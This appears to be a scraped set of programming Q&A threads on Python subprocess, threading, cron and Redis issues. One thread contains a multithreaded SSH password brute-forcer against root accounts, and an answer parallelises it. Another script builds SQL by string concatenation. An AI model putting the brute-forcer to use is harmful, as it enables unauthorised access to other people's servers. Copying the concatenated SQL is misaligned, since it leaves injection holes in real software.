Python, fping, cron - python

I recently wrote a program in Python (first stab at said language) to grab ip addresses from a database, ping them using fping and throw the response times back into said database. App works great from command line, but breaks from crontab
Any help would be greatly appreciated. Thanks
PYTHON CODE -- I got most of this from the interwebs
#!/usr/bin/env python
import MySQLdb as mdb;
import threading
import shlex
from subprocess import Popen, PIPE, STDOUT
import subprocess
con = mdb.connect('localhost', '*****', '*****', '*****')
class myThread(threading.Thread):
def __init__(self, ip_list):
threading.Thread.__init__(self)
self.ip_list = ip_list
def run(self):
get_ping(self.ip_list)
def get_simple_cmd_output(cmd):
args = shlex.split(cmd)
return Popen(args, stdout=PIPE, stderr=subprocess.STDOUT, shell=False).communicate()[0]
def get_ping(ip_list):
ip_response_dict = {}
cmd = "fping -C 4 -q {host}".format(host=" ".join(ip_list))
for x in get_simple_cmd_output(cmd).strip().split(' : ', 0) :
lines = x.split("\n")
for line in lines:
if line.upper().find(":", 0) > 0:
ip_data = line.split(":")
ip_address = ip_data[0].strip()
ip_response = ip_data[1].strip().split(" ")
total = 0;
length = 0;
for ping_time in ip_response:
if ping_time != '' and ping_time != '-':
total += float(ping_time)
length += 1
if total > 0 and length > 0:
ip_response_dict[ip_address] = (total / length)
else:
ip_response_dict[ip_address] = 0
save_ping_times(ip_response_dict)
def save_ping_times(ip_list):
cursor = con.cursor()
for key, value in ip_list.items():
cursor.execute('INSERT INTO `Tech_AP_Ping_Time`(`IP_Address`,`Value`) VALUES ("' + key + '","' + str(round(value, 2)) + '")')
con.commit()
threads = []
chunk_length = 100
with con:
cur = con.cursor(mdb.cursors.DictCursor)
cur.execute("SELECT `IP_Address` FROM `Tech_APs` WHERE (`IP_Address` IS NOT NULL AND `IP_Address` != '') ORDER BY `IP_Address`")
rows = cur.fetchall()
i = 0
ip_list = []
for row in rows:
ip_list.append(row['IP_Address'])
ip_list = [ip_list[i : i + chunk_length] for i in range(0, len(ip_list), chunk_length)]
for ip_chunk in ip_list:
thread = myThread(ip_chunk)
thread.start()
threads.append(thread)
CRON COMMAND - Yes, I have a full path to the script set in my actual cron
*/5 * * * * /usr/bin/python distro_pinger.py
ERROR -- I am getting this when run from the cron
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib64/python2.6/threading.py", line 532, in __bootstrap_inner
self.run()
File "/var/www/html/poller/distro_pinger.py", line 15, in run
get_ping(self.ip_list)
File "/var/www/html/poller/distro_pinger.py", line 25, in get_ping
for x in get_simple_cmd_output(cmd).strip().split(' : ', 0) :
File "/var/www/html/poller/distro_pinger.py", line 19, in get_simple_cmd_output
return Popen(['fping','-C','4','-q','','127.0.0.1'], stdout=PIPE, stderr=subprocess.STDOUT, shell=False).communicate()[0]
File "/usr/lib64/python2.6/subprocess.py", line 639, in __init__
errread, errwrite)
File "/usr/lib64/python2.6/subprocess.py", line 1228, in _execute_child
raise child_exception
OSError: [Errno 2] No such file or directory
Any help at all would be greatly appreciated. (Even if it's you telling me that I did everything wrong :P)

Try adding the full path to fping in your script. That should do the trick.

Which user is fping installed for? Is the crontab setting for this same user? If not, does the user under which the crontab setting is have permissions to the fping directory?

Related

python error in running n inputs processed at the same time using thread

I am new to python. I fetch multiple ip addresses as input from a yml file and assign it to hosts. Using for loop, I iterate through these ips. These ips are processed one by one. It will then write the result to the txt file.I want to run these inputs from for loop which should be processed at the same time and write the result in the txt file. I tried using threads but it is giving errors of writing to the file.
Here is my code:
import yaml
import requests
from itertools import cycle
import os
import http.client
import time
import sys
import signal
import ipaddress
from pathlib import Path
import socket
import time
from datetime import datetime, timedelta
import time
import subprocess
from threading import Thread, Lock
import threading
import random
from _thread import start_new_thread
class heart_beat():
#Function for writing ipv4 to a txt
def ip4write(self,ip,name):
timestamp = datetime.now().strftime("%B %d %Y, %H:%M:%S")
print (ip) #check
global ip4a
ip4a =ip
print("ip",ip)
self.ipve4(ip,name)
hbwrite.write(self,ip,name)
#Funtion for Ipv4
def ipve4(self,ip,name):
try:
global stp
cmd = "ping -c {} -W {} {}".format(count, wait_sec, ip4a).split(' ')
output = subprocess.check_output(cmd).decode().strip()
lines = output.split("\n")
global roundtime_ms,packet_transmit,u
roundtime = lines[1].split()[-2].split('=')[1]
roundtime_ms= float(roundtime) * 1000
packet_transmit = lines[-2].split(',')[0].split()[0]
total = lines[-2].split(',')[3].split()[1]
loss = lines[-2].split(',')[2].split()[0]
timing = lines[-1].split()[3].split('/')
status,result = subprocess.getstatusoutput("ping -c1 -w2 " + str(ip4a))
if status == 0:
print(str(ip4a) + " UP")
u =" UP"
stp = 1
except:
print(e)
def fields(self):
for item in data2:
if item["type"] == "icmp":
#make all variables global
global hosts,ipv4,ipv6,count,wait_sec,schedule,enabled
hosts = (item["host"])
ty_name = (item["name"])
ipv4 = (item["ipv4"])
ipv6 = (item["ipv6"])
timeout1 = (item["timeout"])
timeoutt =int(timeout1.replace("s",""))
print (timeoutt)
fields = (item["fields"])
l1 = []
for key in fields:
lis = 'fields.' + key+':' + fields[key]
print (lis)
l1.append(lis)
fieldcustom = ""
for i in l1:
fieldcustom = fieldcustom + i + "\t\t"
print (fieldcustom)
enabled = (item["enabled"])
count = 1
wait_sec = 1
#Beat function
def beat(self):
#Name for the log file
global lock
name = 'icmp.log'
try:
if(enabled == True):
for ip in hosts:
if(ipv4 == True and ipv6 ==False):
iv = ipaddress.ip_address(ip)
print ("iv",iv.version)
if (iv.version == 4):
start_new_thread(self.ip4write,(ip,name))
except requests.ConnectionError:
print("Error")
class hbwrite():
def write(self,ip,name):
if(stp == 1):
#time.sleep(input)
text_file = open(name , "a+")
text_file.write( "monitor.ip: " "%s" % str(ip) + "\t\t" + "monitor.status: "" %s" % u + "\t\t" + "monitor.id: icmp#icmp-ip#"" %s" % str(ip) + "\t\t" + "icmp.requests:"" %s" % packet_transmit +"\t\t" + "icmp.rtt.us:"" %s" % int(roundtime_ms) +"\t\t" + "beat.name:"" %s" % hostname +"\t\t" + "beat.hostname:"" %s" % hostname + "\t\t" + "beat.version:"" %s" % beatversion +"\t\t" + "tags:"" %s" % tags + "\t\t" + " %s" % fieldcustom )
text_file.write("\n")
text_file.close()
if __name__ == '__main__':
# Load the YAML file in to data
data = yaml.safe_load(open('beat.yml'))
data2 = data.get('heartbeat.monitors')
hb = heart_beat()
#For setting variables with values
hb.fields()
hb.beat()
Code in YAML file:
heartbeat.monitors:
- type: icmp
name: icmp
host: ["192.168.1.9","192.168.1.36"]
enabled: True
#schedule: "* * * * * */5"
schedule: "*/1 * 4 2 *"
#schedule: "*/2 17 29 1 * *"
ipv4: True
ipv6: False
#mode:
timeout: 20s
tags: ["res1","ip1"]
fields:
a: apple
b: green
Error i got:
Fatal Python error: could not acquire lock for <_io.BufferedWriter name='<stdout>'> at interpreter shutdown, possibly due to daemon threads
Thread 0x00007f9fd5ed3700 (most recent call first):
File "stackover.py", line 27 in ip4write
Thread 0x00007f9fd66d4700 (most recent call first):
File "stackover.py", line 30 in ip4write
Thread 0x00007f9fd6ed5700 (most recent call first):
File "/usr/lib/python3.5/subprocess.py", line 1397 in _get_handles
File "/usr/lib/python3.5/subprocess.py", line 911 in __init__
File "/usr/lib/python3.5/subprocess.py", line 693 in run
File "/usr/lib/python3.5/subprocess.py", line 626 in check_output
File "stackover.py", line 40 in ipve4
File "stackover.py", line 32 in ip4write
Current thread 0x00007f9fdab47700 (most recent call first):
Aborted (core dumped)

ImportError on RQ Worker/Redis/Flask

I am having issues with this setup. In summary, once the user presses submit on a form then the data is passed to an RQWorker and Redis to process.
The error from rqworker is
23:56:44 RQ worker u'rq:worker:HAFun.12371' started, version 0.5.6
23:56:44
23:56:44 *** Listening on default...
23:56:57 default: min_content.process_feed.process_checks(u'http://www.feedurl.com/url.xml', u'PM', u'alphanumeric', u'domain#domain.com') (9e736730-e97f-4ee5-b48d-448d5493dd6c)
23:56:57 ImportError: No module named min_content.process_feed
Traceback (most recent call last):
File "/var/www/min_content/min_content/venv/local/lib/python2.7/site-packages/rq/worker.py", line 568, in perform_job
rv = job.perform()
File "/var/www/min_content/min_content/venv/local/lib/python2.7/site-packages/rq/job.py", line 495, in perform
self._result = self.func(*self.args, **self.kwargs)
File "/var/www/min_content/min_content/venv/local/lib/python2.7/site-packages/rq/job.py", line 206, in func
return import_attribute(self.func_name)
File "/var/www/min_content/min_content/venv/local/lib/python2.7/site-packages/rq/utils.py", line 150, in import_attribute
module = importlib.import_module(module_name)
File "/usr/lib/python2.7/importlib/__init__.py", line 37, in import_module
__import__(name)
ImportError: No module named min_content.process_feed
Traceback (most recent call last):
File "/var/www/min_content/min_content/venv/local/lib/python2.7/site-packages/rq/worker.py", line 568, in perform_job
rv = job.perform()
File "/var/www/min_content/min_content/venv/local/lib/python2.7/site-packages/rq/job.py", line 495, in perform
self._result = self.func(*self.args, **self.kwargs)
File "/var/www/min_content/min_content/venv/local/lib/python2.7/site-packages/rq/job.py", line 206, in func
return import_attribute(self.func_name)
File "/var/www/min_content/min_content/venv/local/lib/python2.7/site-packages/rq/utils.py", line 150, in import_attribute
module = importlib.import_module(module_name)
File "/usr/lib/python2.7/importlib/__init__.py", line 37, in import_module
__import__(name)
ImportError: No module named min_content.process_feed
23:56:57 Moving job to u'failed' queue
I have tried starting rqworker in a variety of ways
rqworker --url redis://localhost:6379
rqworker
views.py
from min_content import app
from flask import render_template
from .forms import SubmissionForm
from flask import request
from .process_feed import process_checks #this is the function that does the checks
from redis import Redis
from rq import Queue
def process():
feedUrl = request.form['feedUrl']
source = request.form['pmsc']
ourAssignedId = request.form['assignedId']
email_address = request.form['email_address']
conn = redis.StrictRedis('localhost', 6379, 0)
q = Queue(connection=conn)
result = q.enqueue(process_checks, feedUrl,source,ourAssignedId, email_address)
return 'It\'s running and we\'ll send you an email when its done<br /><br />Do another one'
process_feed has a function called process_checks which works as expected.
I know this is working because using the below line, instead of RQ, works fine.
do_it = process_checks(feedUrl,source,ourAssignedId)
The strange thing is that this all worked perfectly well before I closed my SSH connection to the VPS.
Running ps -aux returns this which indicates the redis is running
root 11894 0.1 0.4 38096 2348 ? Ssl Oct25 0:01 /usr/local/bin/redis-server *:6379
Restarting redis does nothing, nor does restarting apache2
sudo service redis_6379 start
sudo service redis_6379 stop
sudo service apache2 restart
I followed this guide exactly and like I said, this worked until I terminated the SSH connection to my VPS
I'm running in a virtual environment if that makes any difference, I am calling this within my WSGI file
min_content.wsgi
#!/usr/bin/python
activate_this = '/var/www/min_content/min_content/venv/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))
import sys
import logging
logging.basicConfig(stream=sys.stderr)
sys.path.insert(0,"/var/www/min_content")
from min_content import app as application
application.secret_key = 'blah blah blah
'
I have confirmed that the Redis server is running by adding this to the script
r = redis.StrictRedis('localhost', 6379, 0)
r.set(name='teststring', value='this is a test')
test_string = r.get(name='teststring')
print test_string
Running redis-cli returns 127.0.0.1:6379>
process_feed.py
import requests
import xml.etree.ElementTree as ET
import csv
def process_checks(feedUrl,source,ourAssignedId):
feed_url = feedUrl
source = source
ourAssignedId = ourAssignedId
all_the_data = []
#grab xml from URL
try:
r = requests.get(feed_url)
except Exception as e:
print "Failed to grab from " + feed_url
return "Failed to grab from " + feed_url
root = ET.fromstring(r.text)
for advertiser in root.iter('advertiser'):
assignedId = advertiser.find('assignedId').text
if assignedId==ourAssignedId:
#only process for PMs using our assignedId
for listings in advertiser.iter('listingContentIndexEntry'):
listingUrl = listings.find('listingUrl').text
print "Processing " + listingUrl
#now grab from URL
listing_request = requests.get(listingUrl)
#parse XML from URL
#listing_root = ET.xpath(listing_request.text)
if not ET.fromstring(listing_request.text.encode('utf8')):
print "Failed to load XML for" + listingUrl
continue
else:
listing_root = ET.fromstring(listing_request.text.encode('utf8'))
#'Stayz Property ID','External Reference','User Account External Reference','Provider','Address Line1','Active','Headline','Listing URL'
stayzPropertyId = '' #the property manager enters this into the spreadsheet
if not listing_root.find('.//externalId').text:
print 'No external Id in ' + listingUrl
listingExternalId = 'None'
else:
listingExternalId = listing_root.find('externalId').text
listingExternalId = '"' + listingExternalId + '"'
userAccountExternalReference = assignedId
print userAccountExternalReference
provider = source
addressLine1 = listing_root.find('.//addressLine1').text
active = listing_root.find('active').text
if not listing_root.find('.//headline/texts/text/textValue').text:
print 'No headline in ' + listingExternalId
headline = 'None'
else:
headline = listing_root.find('.//headline/texts/text/textValue').text
headline = headline.encode('utf-8')
if not listing_root.find('.//description/texts/text/textValue').text:
print 'No description in ' + listingExternalId
description = 'None'
else:
description = listing_root.find('.//description/texts/text/textValue').text
#now check the min content
#headline length
headline_length = len(headline)
headline_length_check = 'FAIL'
if headline_length<20:
headline_length_check = 'FAIL'
else:
headline_length_check = 'TRUE'
#description length
description_length_check = 'FAIL'
description_length = len(description)
if description_length<400:
description_length_check = 'FAIL'
else:
description_length_check = 'TRUE'
#number of images
num_images = 0
num_images_check = 'FAIL'
for images in listing_root.iter('image'):
num_images = num_images+1
if num_images <6:
num_images_check = 'FAIL'
else:
num_images_check = 'TRUE'
#atleast one rate
num_rates = 0
num_rates_check = 'FAIL'
for rates in listing_root.iter('rate'):
num_rates = num_rates+1
if num_rates < 1:
num_rates_check = 'FAIL'
else:
num_rates_check = 'TRUE'
#atleast one bedroom
#atleast one bathroom
#a longitude and latitude
#now add to our list of lists
data = {'stayzPropertyId':'','listingExternalId':listingExternalId,'userAccountExternalReference':userAccountExternalReference,'provider':provider,'addressLine1':addressLine1,'active':active,'headline':headline,'listingUrl':listingUrl,'Headline > 20 characters?':headline_length_check,'Description > 400 characters?':description_length_check,'Number of Images > 6?':num_images_check,'At least one rate?':num_rates_check}
#data_dict = ['',listingExternalId,userAccountExternalReference,provider,addressLine1,active,headline,listingUrl]
all_the_data.append(data)
files_location = './files/' + source + '__' + ourAssignedId + '_export.csv'
with open(files_location,'w') as csvFile:
#with open('./files/' + source + '_export.csv','a') as csvFile:
fieldnames = ['stayzPropertyId','listingExternalId','userAccountExternalReference','provider','addressLine1','active','headline','listingUrl','Headline > 20 characters?','Description > 400 characters?','Number of Images > 6?','At least one rate?']
writer = csv.DictWriter(csvFile,fieldnames=fieldnames)
writer.writeheader()
for row in all_the_data:
try:
writer.writerow(row)
except:
print "Failed to write row " + str(row)
continue
#send email via Mailgun
return requests.post(
"https://api.mailgun.net/v3/sandboxablahblablbah1.mailgun.org/messages",
auth=("api", "key-blahblahblah"),
#files=("attachment", open(files_location)),
data={"from": "Mailgun Sandbox <postmaster#.mailgun.org>",
"to": "Me <me#me.com>",
"subject": "Feed Processed for " + ourAssignedId,
"text": "Done",
"html":"<b>Process the file</b>"})

Multithreading my simple SSH Brute forcer

I've coded a simple SSH Bruteforcer , and I am trying to make it multi-threaded as it is running very slowly at the moment. As you can see in the last few lines I have given it an attempt, but don't understand threading fully. I have read a few examples but I don't quite understand it fully, so I felt adding into my program will make me understand it better.
Code:
try:
import paramiko
except ImportError:
print("Paramiko module not installed, exiting.")
from multiprocessing.dummy import Pool, Process, JoinableQueue as Queue
import os
from datetime import datetime
startTime = datetime.now()
UserName2 = 'root'
pass_file = 'pass.txt'
ip_file = 'ip.txt'
port = 22
Found = 0
IPLines = 0
PasswordLines = 0
with open('pass.txt') as txt1:
for line in txt1:
if line.strip():
PasswordLines += 1
with open('ip.txt') as txt2:
for line2 in txt2:
if line2.strip():
IPLines += 1
current_attempts = 0
max_attempts = PasswordLines * IPLines
def print_results(found):
while True:
ip, password = found.get()
print("Found: %r %r" % (ip, password))
found.task_done()
def init(found_):
global found
found = found_
def generate_passwords():
#return (line.strip() for line in open(pass_file))
global ip
global pwd
global txt4
txt3 = open(pass_file, "r")
txt4 = open(ip_file, "r")
for line3 in txt3.readlines():
pwd = line3.strip()
for line4 in txt4.readlines():
ip = line4.strip()
def check(ip_password):
global current_attempts
ip, password = ip_password
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(ip, port, username=UserName2, password=pwd)
except paramiko.AuthenticationException, e:
print e
print '[-] %s:%s fail!' % (UserName2, pwd)
current_attempts += 1
except Exception, e:
print e
else:
print '[!] %s:%s is CORRECT for IP %s!' % (UserName2, pwd, ip)
username, password, ipaddress = UserName2, pwd, ip
found.put((username,password,ipaddress))
seconds_taken = datetime.now() - startTime
print 'brute forcing took %s seconds' % seconds_taken
ssh.close()
print 'Found login in %s attempts' % current_attempts
if os.path.isfile("correct.txt"):
c = open("correct.txt", "a")
c.write('\n' + ip + ':' + UserName2 + ':' + pwd)
elif os.path.isfile("correct.txt"):
c = open('correct.txt', "w")
c.write(ip + ':' + UserName2 + ':' + pwd)
def main():
found = Queue()
t = Process(target=check, args=[found])
t.daemon = True # do not survive the parent
t.start()
pool = Pool(processes=20, initializer=init, initargs=[found])
args = ((ip, password) for password in generate_passwords() for ip in txt4)
for _ in pool.imap_unordered(check, args):
pass
pool.close() # no more tasks
pool.join() # wait for all tasks in the pool to complete
found.join() # wait until all results are printed
if __name__ == "__main__":
main()
Errors:
Exception in thread Thread-1:
Traceback (most recent call last):
File "C:\Python27\lib\threading.py", line 810, in __bootstrap_inner
self.run()
File "C:\Python27\lib\threading.py", line 763, in run
self.__target(*self.__args, **self.__kwargs)
File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 65, in check
ip, password = ip_password
TypeError: iteration over non-sequence
Traceback (most recent call last):
File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 107, in <module>
main()
File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 99, in main
args = ((ip, password) for password in generate_passwords() for ip in txt4)
TypeError: 'NoneType' object is not iterable
The problem is embarrassingly parallel. You can run concurrently the ssh connection attempts both for different ips and passwords:
#!/usr/bin/env python
# remove .dummy to use processes instead of threads
from multiprocessing.dummy import Pool
def check(params):
ip, username, password = params
# emulate ssh login attempt #XXX put your ssh connect code here
import random
successful = random.random() < .0001
return successful, params
def main():
creds = {}
ips = ["168.1.2.%d" % i for i in range(256)] #XXX dummy ip list, use yours
usernames = ["nobody", "root"] #XXX dummy user list, use yours
def generate_args():
for ip in ips:
for username in usernames:
for password in generate_passwords():
if (ip, username) in creds:
break
yield ip, username, password
pool = Pool(processes=20)
for success, params in pool.imap_unordered(check, generate_args()):
if not success:
continue
print("Found: %r" % (params,))
ip, username, password = params
creds[ip, username] = password
pool.close() # no more tasks
pool.join() # wait for all tasks in the pool to complete
if __name__=="__main__":
main()
where ips is a list if all ips you want to try and generate_passwords() is a generator that yields one password at a time, here's an example:
def generate_passwords(pass_file):
return (line.strip() for line in open(pass_file))
About errors
ValueError: too many values to unpack
your code has found.put((username,password,ipaddress)) (a tuple with 3 values) but print_results() function expects ip, password = found.get() (2 values). The error "too many values to unpack" is because 3 is larger than 2.
'NoneType' object is not iterable
attempt() function returns nothing (None) but you put it in the place for generate_passwords() that must generate passwords (see the example implementation above).

Python-Subprocess-Popen Deadlock in a multi-threaded environment

I have following piece of code running inside thread..where 'expand' C executable produces unique string output for each input 'url':
p = Popen(["expand", url], bufsize=65536, stdout=PIPE, stderr=PIPE, close_fds=True)
output,error = p.communicate()
print output
I have implemented a Queue based multithreading solution which processes 5000 urls in a batch of 100 each..
When I run the script; it hangs.. and ps -aef shows that 2 processes are still running:
1. 10177 5721 6662 6 09:25 pts/15 00:04:36 python expandPlaylist.py -s -t
2. 10177 11004 5721 0 09:26 pts/15 00:00:00 expand http://www.sample.com
Stack trace for main python script:
# ThreadID: 140332211570432
File: "expandPlaylist.py", line 902, in <module>
Main()
File: "expandPlaylist.py", line 894, in Main
startmain(db, c, conf)
File: "expandPlaylist.py", line 834, in startmain
stream_queue.join()
File: "/usr/lib64/python2.7/Queue.py", line 82, in join
self.all_tasks_done.wait()
File: "/usr/lib64/python2.7/threading.py", line 238, in wait
waiter.acquire()
Stack trace for Thread which got deadlocked
# ThreadID: 140332016596736
File: "/usr/lib64/python2.7/threading.py", line 503, in __bootstrap
self.__bootstrap_inner()
File: "/usr/lib64/python2.7/threading.py", line 530, in __bootstrap_inner
self.run()
File: "expandPlaylist.py", line 120, in run
self.process.wait()
File: "/usr/lib64/python2.7/subprocess.py", line 1242, in wait
pid, sts = _eintr_retry_call(os.waitpid, self.pid, 0)
File: "/usr/lib64/python2.7/subprocess.py", line 471, in _eintr_retry_call
return func(*args)
GDB details for process_id: 11004
(gdb) bt
#0 __lll_lock_wait () at ../nptl/sysdeps/unix/sysv/linux/x86_64/lowlevellock.S:136
#1 0x00007fc36bd33294 in _L_lock_999 () from /lib64/libpthread.so.0
#2 0x00007fc36bd330aa in __pthread_mutex_lock (mutex=0x6a8c20) at pthread_mutex_lock.c:61
#3 0x00007fc36c204dcd in g_mutex_lock (mutex=0x6a8c50) at gthread-posix.c:213
#4 0x00007fc36c1b11df in g_source_unref_internal (source=0x844f90, context=0x6a8c50, have_lock=0) at gmain.c:1975
#5 0x00007fc36c1b13e3 in g_source_unref (source=0x844f90) at gmain.c:2044
#6 0x00007fc36cb475a9 in soup_session_dispose (object=0x61e100) at soup-session.c:305
#7 0x00007fc36c4d270e in g_object_unref (_object=0x61e100) at gobject.c:3160
#8 0x000000000040584b in dispose_session (parser=0x618020) at al_playlist_parser.c:859
#9 0x0000000000403b0b in al_playlist_parser_dispose (obj=0x618020) at al_playlist_parser.c:129
#10 0x00007fc36c4d270e in g_object_unref (_object=0x618020) at gobject.c:3160
#11 0x0000000000403315 in main (argc=1, argv=0x7fff462cdca8) at al_expand.c:143
How can I avoid the deadlock?
Otherwise is there any way to bind timeout with self.process.wait() and terminate that thread if the subprocess is taking too long to process?
If you only have to call a subprocess on a list of arguments, I tend to do something like this:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Author: R.F. Smith <rsmith#xs4all.nl>
# $Date: 2013-11-24 11:06:39 +0100 $
#
# To the extent possible under law, Roland Smith has waived all copyright and
# related or neighboring rights to vid2mp4.py. This work is published from the
# Netherlands. See http://creativecommons.org/publicdomain/zero/1.0/
"""Convert all video files given on the command line to H.264/AAC streams in
an MP4 container."""
from __future__ import print_function, division # for compatibility with Python 2.
__version__ = '$Revision: cac4808 $'[11:-2]
import os
import sys
import subprocess
from multiprocessing import cpu_count
from time import sleep
def warn(s):
"""Print a warning message.
:param s: Message string
"""
s = ' '.join(['Warning:', s])
print(s, file=sys.stderr)
def checkfor(args, rv=0):
"""Make sure that a program necessary for using this script is
available.
:param args: String or list of strings of commands. A single string may
not contain spaces.
:param rv: Expected return value from evoking the command.
"""
if isinstance(args, str):
if ' ' in args:
raise ValueError('no spaces in single command allowed')
args = [args]
try:
with open(os.devnull, 'w') as bb:
rc = subprocess.call(args, stdout=bb, stderr=bb)
if rc != rv:
raise OSError
except OSError as oops:
outs = "Required program '{}' not found: {}."
print(outs.format(args[0], oops.strerror))
sys.exit(1)
def startencoder(fname):
"""Use ffmpeg to convert a video file to H.264/AAC
streams in an MP4 container.
:param fname: Name of the file to convert.
:returns: a 3-tuple of a Process, input path and output path
"""
basename, ext = os.path.splitext(fname)
known = ['.mp4', '.avi', '.wmv', '.flv', '.mpg', '.mpeg', '.mov', '.ogv']
if ext.lower() not in known:
warn("File {} has unknown extension, ignoring it.".format(fname))
return (None, fname, None)
ofn = basename + '.mp4'
args = ['ffmpeg', '-i', fname, '-c:v', 'libx264', '-crf', '29', '-flags',
'+aic+mv4', '-c:a', 'libfaac', '-sn', ofn]
with open(os.devnull, 'w') as bitbucket:
try:
p = subprocess.Popen(args, stdout=bitbucket, stderr=bitbucket)
print("Conversion of {} to {} started.".format(fname, ofn))
except:
warn("Starting conversion of {} failed.".format(fname))
return (p, fname, ofn)
def manageprocs(proclist):
"""Check a list of subprocesses tuples for processes that have ended and
remove them from the list.
:param proclist: a list of (process, input filename, output filename)
tuples.
"""
print('# of conversions running: {}\r'.format(len(proclist)), end='')
sys.stdout.flush()
for p in proclist:
pr, ifn, ofn = p
if pr is None:
proclist.remove(p)
elif pr.poll() is not None:
print('Conversion of {} to {} finished.'.format(ifn, ofn))
proclist.remove(p)
sleep(0.5)
def main(argv):
"""Main program.
:param argv: command line arguments
"""
if len(argv) == 1:
binary = os.path.basename(argv[0])
print("{} version {}".format(binary, __version__), file=sys.stderr)
print("Usage: {} [file ...]".format(binary), file=sys.stderr)
sys.exit(0)
checkfor(['ffmpeg', '-version'])
avis = argv[1:]
procs = []
maxprocs = cpu_count()
for ifile in avis:
while len(procs) == maxprocs:
manageprocs(procs)
procs.append(startencoder(ifile))
while len(procs) > 0:
manageprocs(procs)
if __name__ == '__main__':
main(sys.argv)
If hanging processes are an issue, you could adapt to manageprocs to kill a subprocess after a certain amount of time.

convert Ghostscript from os.popen to subsession.popen python

I need to create a Monkey patch for Ghostscript, I have to migrate from os.popen to subsession.popen because I can't use the shell in my system.
I tried it in this way:
def mioGhostscript(tile, size, fp):
"""Render an image using Ghostscript (Unix only)"""
# Unpack decoder tile
decoder, tile, offset, data = tile[0]
length, bbox = data
import tempfile, os
file = tempfile.mktemp()
# Build ghostscript command
command = ["gs",
"-q", # quite mode
"-g%dx%d" % size, # set output geometry (pixels)
"-dNOPAUSE -dSAFER", # don't pause between pages, safe mode
"-sDEVICE=ppmraw", # ppm driver
"-sOutputFile=%s" % file,# output file
"- >/dev/null 2>/dev/null"
]
#command = shlex.split(string.join(command))
# push data through ghostscript
try:
#gs = os.popen(command, "w")
args = command#['gs','-dSAFER','-dNOPAUSE','-dBATCH','-sDEVICE=jpeg','-sOutputFile=/home/user/output2.jpg /home/user/downloads/test.pdf']
gs = subprocess.Popen( args, stdout = PIPE, stderr = STDOUT, stdin=PIPE )
# adjust for image origin
if bbox[0] != 0 or bbox[1] != 0:
#gs.write("%d %d translate\n" % (-bbox[0], -bbox[1]))
gs.stdin.write("%d %d translate\n" % (-bbox[0], -bbox[1]))
fp.seek(offset)
while length > 0:
s = fp.read(8192)
if not s:
break
length = length - len(s)
raise Exception(s)
gs.stdin.write(s)
gs.communicate()[0]
status = gs.stdin.close()
#status = gs.close()
#if status:
# raise IOError("gs failed (status %d)" % status)
im = Image.core.open_ppm(file)
finally:
try: os.unlink(file)
except: pass
return im
import PIL
PIL.EpsImagePlugin.Ghostscript = mioGhostscript
but i have this traceback:
Traceback (most recent call last): File "/home/web/lib/driver_mod_python.py", line 252, in handler buf = m.__dict__[pard['program']](pard) File "/home/dtwebsite/bin/cms_gest_ordini.py", line 44, in wrapped return func(pard) File "/home/dtwebsite/bin/cms_gest_ordini.py", line 95, in wrapped return func(pard) File "/home/dtwebsite/bin/cms_gest_picking_list.py", line 341, in picking_list tr_modelllo = render_row_picking_list(pard, item, picked=0, plist_allowed=plist_allowed) File "/home/dtwebsite/bin/cms_gest_picking_list.py", line 432, in render_row_picking_list aa = a.tostring() File "/rnd/apps/interpreters/python-2.5.6/lib/python2.5/site-packages/PIL/Image.py", line 532, in tostring self.load() File "/rnd/apps/interpreters/python-2.5.6/lib/python2.5/site-packages/PIL/EpsImagePlugin.py", line 283, in load self.im = Ghostscript(self.tile, self.size, self.fp) File "/home/dtwebsite/bin/cms_gest_picking_list.py", line 64, in mioGhostscript gs.stdin.write(s) IOError: [Errno 32] Broken pipe
someone can help me please?
I found the solution at the problem.
It was with the PIL package, something didn't compile right during the installation.
After that i had a dependencies problem.
I fixed it in the following way:
import PIL.EpsImagePlugin
PIL.EpsImagePlugin.Ghostscript = mioGhostscript
Then I saw this in the command:
"- >/dev/null 2>/dev/null"
the code is a shell's code and it didn't work on my system because python tried to read a file literally named - >/dev/null 2>/dev/null and it doesn't exist.
I replaced
"- >/dev/null 2>/dev/null"
with
"-"
and the program now read from the stdin.
The final code is:
def mioGhostscript(tile, size, fp):
"""Render an image using Ghostscript (Unix only)"""
# Unpack decoder tile
decoder, tile, offset, data = tile[0]
length, bbox = data
import tempfile, os
file = tempfile.mktemp()
# Build ghostscript command
command = ["gs",
"-q", # quite mode
"-g%dx%d" % size, # set output geometry (pixels)
"-dNOPAUSE -dSAFER", # don't pause between pages, safe mode
"-sDEVICE=ppmraw", # ppm driver
"-sOutputFile=%s" % file,# output file
"-"
]
#command = shlex.split(string.join(command))
# push data through ghostscript
try:
#gs = os.popen(command, "w")
args = command#['gs','-dSAFER','-dNOPAUSE','-dBATCH','-sDEVICE=jpeg','-sOutputFile=/home/user/output2.jpg /home/user/downloads/test.pdf']
gs = subprocess.Popen( args, stdout = PIPE, stderr = STDOUT, stdin=PIPE )
# adjust for image origin
if bbox[0] != 0 or bbox[1] != 0:
#gs.write("%d %d translate\n" % (-bbox[0], -bbox[1]))
gs.stdin.write("%d %d translate\n" % (-bbox[0], -bbox[1]))
fp.seek(offset)
while length > 0:
s = fp.read(8192)
if not s:
break
length = length - len(s)
gs.stdin.write(s)
gs.communicate()[0]
status = gs.stdin.close()
#status = gs.close()
#if status:
# raise IOError("gs failed (status %d)" % status)
im = Image.core.open_ppm(file)
finally:
try: os.unlink(file)
except: pass
return im
import PIL.EpsImagePlugin
PIL.EpsImagePlugin.Ghostscript = mioGhostscript
I hope this posts can help someone.

Categories